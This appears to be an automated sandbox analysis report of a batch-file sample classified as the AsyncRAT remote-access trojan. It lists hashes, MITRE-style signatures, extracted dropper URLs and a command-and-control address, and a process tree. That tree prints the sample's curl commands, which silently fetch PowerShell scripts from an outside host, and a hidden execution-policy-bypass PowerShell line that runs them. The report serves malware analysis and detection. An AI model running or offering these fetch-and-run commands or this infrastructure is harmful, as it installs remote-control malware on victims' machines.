Overview

overview

10

Static

static

1

21d7310605...6d.bat

windows7-x64

8

21d7310605...6d.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    13-08-2024 01:07

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d.bat

  • Size

    1KB

  • MD5

    0850bed86b58f6cc688a9bdc572cbb09

  • SHA1

    4231a90ab16aa0486d28a07797977154c0407db6

  • SHA256

    21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d

  • SHA512

    75c7cc7977e4e641b02c7dea16dd4b0d11d1b867401cd11900d38b62698d3614125576d6ba1156d8e4843b19d081ce7399f9aa6e3539bf7f2692727d43d1578d

Score
10/10
asyncratdefaultdiscoveryexecutionrat

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/ba8ee9ec-b88f-4790-9a20-15398c1906da/e12f0f2d-542f-4d56-ab33-6696336c0e9c?temp_url_sig=f59339ce78a96139157b21132687d93c516b7e0dff5892c1129220cdce51dcb2&temp_url_expires=1722978000811&filename=AE.exe
exe.dropper

https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/719ce3c5-8399-415d-82c3-ba4c5ebae040/451e981f-3416-484b-ba8a-6c3aae1417f9?temp_url_sig=556153ec968ac29ad231ea6c322f68ca67bb5cdcaac01d58e5fbd2c716a5edd8&temp_url_expires=1722977955443&filename=Client.exe

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

185.169.54.165:7331

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\21d7310605e581dbcd8a1c485e6587969c4220cc34962f632735facee89f356d.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3084
    • C:\Windows\system32\curl.exe
      curl --silent -o "C:\Users\Admin\Downloads\yenisc.ps1" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/b496ff8d-f746-436f-9f51-f0f5e9a54c72/c9964749-ce1b-4755-bdf4-1baeace3f824?temp_url_sig=309db29aa8525a320e6e31b7be5c56c9ddfc1ce17173e0f6ce668675f2e8239f&temp_url_expires=1722978047256&filename=gBCncelbypass.ps1"
      2⤵
        PID:2228
      • C:\Windows\system32\curl.exe
        curl --silent -o "C:\Users\Admin\Downloads\yenisc2.ps1" "https://sw.lifeboxtransfer.com/v1/AUTH_LT_fc856d57-7abc-4ad2-ac90-950f9e675133/LT_2b3e0aa5-ea4c-4b6c-b4fb-ffd97f55a523/b496ff8d-f746-436f-9f51-f0f5e9a54c72/80eb5218-4192-45e1-9974-d46407fc1475?temp_url_sig=d9d4b8fce07cbf5e93d6e2ce6a634b2e74f0697b1a7fc4ff90f5016fbe6e090e&temp_url_expires=1722978046557&filename=stub.ps1"
        2⤵
          PID:3944
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoProfile -Command "& 'C:\Users\Admin\Downloads\yenisc.ps1'; & 'C:\Users\Admin\Downloads\yenisc2.ps1'; Start-Sleep -Seconds 6; & 'C:\Users\Admin\Downloads\yenisc.ps1'; & 'C:\Users\Admin\Downloads\yenisc2.ps1'"
          2⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:700
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.cmdline"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1172
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB824.tmp" "c:\Users\Admin\AppData\Local\Temp\wn1gewpy\CSC7149A958CDF8479EA954F652EAD7A93B.TMP"
              4⤵
                PID:1296
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:4664
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              3⤵
                PID:4212
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:4660

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\RESB824.tmp
            Filesize

            1KB

            MD5

            7b0d9cf75cb72ac5bfde0651db7f07f1

            SHA1

            0d9dca2f8e37c6974010de78693e5d0d6bf9be7b

            SHA256

            4dccfa22d79174feeee58dff68d4af1602da5916b95659cb30270fad8aa46ff1

            SHA512

            7ce140a28b4f0bc31518c258180771a58d875a04f9a4ef0880f42fdb9dc9ca3d929803baa7526c3a67db1c68dbdc13f279d52c5a996b239ec4b58662f78189a0

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_eixxqisj.ket.ps1
            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

            Download Submit

          • C:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.dll
            Filesize

            8KB

            MD5

            066549bd71370624602aaff96417a8e3

            SHA1

            62291ab112f18108652935d516dfca17f8b9f942

            SHA256

            09d3e9fb3203929be08ebedeca627261a0b170d3676b7f59763c80163f3d7a6a

            SHA512

            ac1bd6f885e93f847720cf02a52188d8aae63fcd7c3889b2129c3913dd6555c0e4eeee834533598718b7f871925372b194e7dfc397cb06c78a7397e7ef0458a6

            Download Submit

          • C:\Users\Admin\Downloads\yenisc.ps1
            Filesize

            11KB

            MD5

            1aeb09dfea797e31fb06087d48e87cc8

            SHA1

            ffc83b868ea7e57c86053c823c3a0c17b7f81479

            SHA256

            77842b05bf2ff23d3cb8ebb019f7d40310280c65816f78f655b011162a67dd85

            SHA512

            4181c8d4ce6e5fd9f433d42318fce462e376662ed792281b4b8bcfada7a3d6dc000afbc26e7b3450fb36d3e8c4d0707192e42451c37a9854ad8ffa32a37c3cd7

            Download Submit

          • C:\Users\Admin\Downloads\yenisc2.ps1
            Filesize

            2KB

            MD5

            b4ce78d3ce06757ceac96f41e3d063b6

            SHA1

            8be4093f5effe6df2734b5db044fec34bddaa2fb

            SHA256

            344c7da93f656041139c2025a960539db8916f2ab80dc780ef6eefab359fed04

            SHA512

            6933c30575451de6b36d38befe85a4e5fb6612073a1a16605f43b6a9bcad6e1a5cabd113a59950e3bf93c427edef1c7139cec2665ad9cecb9fe660b5a8b5c757

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\wn1gewpy\CSC7149A958CDF8479EA954F652EAD7A93B.TMP
            Filesize

            652B

            MD5

            fd15820bb68382424e3d446f5fb03b4a

            SHA1

            7c7dca922b6c02c8a766852a1bfa0cb68d6001de

            SHA256

            063b5a27447cb98044c359c6b2efbe5a57bff2eadb3b8bef4dfa1184c26b9dd9

            SHA512

            3e1ca0aba3b83c2ccf3e4b1784a98fc9ae10cff13e5a597d8fcdc69f4a49d09764dc24aafc7201c858ec8c34833b17659c4622225a3f8c4cf9b67a4d6a9c1f4b

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.0.cs
            Filesize

            11KB

            MD5

            663338909086aed18110382d73ff9594

            SHA1

            25685ec0deef7d8170c98c65dbe937ed9181115f

            SHA256

            4ad28ba4ff78fce289b3dc6fbba82f8a98302725f3a75531a7647c2548cec447

            SHA512

            9d861659219c9b162d2669417236e103b4dccb1f1ed48d8415f00b3fdcc972617ab775154cab1061b58148485fa8ba98c2d0a1b79e1bcf88c0f0e2554af3a1f3

            Download Submit

          • \??\c:\Users\Admin\AppData\Local\Temp\wn1gewpy\wn1gewpy.cmdline
            Filesize

            369B

            MD5

            6db9233a5c30d5eeb8f6d26316411afd

            SHA1

            db768d27f25ddba2994027581a9ddfd856f7dd8b

            SHA256

            dbfe0137c72b4a6062ed3e27cc59ae0a09f184e5136081fae81abb9bb819caf9

            SHA512

            e313a0a3b631b1c7037608c61109cd24b0066d5946780cd6063c10d8e0141d71923eb5cb3d29ae64716e30e6d23c5997f15f45b96a9644df09012c8b59117193

            Download Submit

          • memory/700-15-0x00007FFCF9420000-0x00007FFCF9EE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/700-2-0x00007FFCF9423000-0x00007FFCF9425000-memory.dmp

            Filesize

            8KB

            Download

          • memory/700-13-0x00007FFCF9420000-0x00007FFCF9EE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/700-28-0x000001CCAAF10000-0x000001CCAAF18000-memory.dmp

            Filesize

            32KB

            Download

          • memory/700-8-0x000001CCAB380000-0x000001CCAB3A2000-memory.dmp

            Filesize

            136KB

            Download

          • memory/700-31-0x000001CCC5930000-0x000001CCC5970000-memory.dmp

            Filesize

            256KB

            Download

          • memory/700-32-0x000001CCAB3D0000-0x000001CCAB3D6000-memory.dmp

            Filesize

            24KB

            Download

          • memory/700-42-0x00007FFCF9420000-0x00007FFCF9EE1000-memory.dmp

            Filesize

            10.8MB

            Download

          • memory/4664-33-0x0000000000400000-0x0000000000412000-memory.dmp

            Filesize

            72KB

            Download

          • memory/4664-36-0x0000000005EA0000-0x0000000005F3C000-memory.dmp

            Filesize

            624KB

            Download

          • memory/4664-37-0x00000000064F0000-0x0000000006A94000-memory.dmp

            Filesize

            5.6MB

            Download

          • memory/4664-38-0x0000000005FB0000-0x0000000006016000-memory.dmp

            Filesize

            408KB

            Download